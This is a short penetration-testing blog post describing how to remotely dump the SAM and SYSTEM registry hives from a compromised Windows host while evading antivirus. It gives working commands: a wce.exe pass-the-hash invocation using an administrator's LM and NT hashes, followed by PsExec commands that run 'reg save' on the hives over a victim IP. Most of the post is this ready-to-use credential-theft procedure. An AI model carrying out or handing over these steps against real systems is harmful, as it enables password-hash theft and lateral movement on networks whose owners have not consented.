Remotely Dump SAM/SYSTEM Files & Avoid A/V

This command came in very handy on a recent pentest. Essentially this allows us to dump out the SAM and SYSTEM files on a compromised host, whilst also helping avoid A/V. It should be noted that this is a post exploitation task and assumes you have SYSTEM access to the host/or are using a privileged hash to authenticate from a remote system.

If you wish to perform this attack remotely you’ll need the relevant hash and wce to perform the following command:

wce.exe -s administrator:500:LMHASH:NTHASH -c cmd.exe

Then in the spawned window you can use the following:

PsExec.exe \\%VICTIM_IP% reg save hklm\system %LOCATION% & PsExec.exe \\%VICTIM_IP% reg save hklm\sam %LOCATION%

If you have local access you can obviously drop the wce and psexec sections.

If you have any issues accessing ADMIN$ etc you can always use the reg hack as described in a previous post.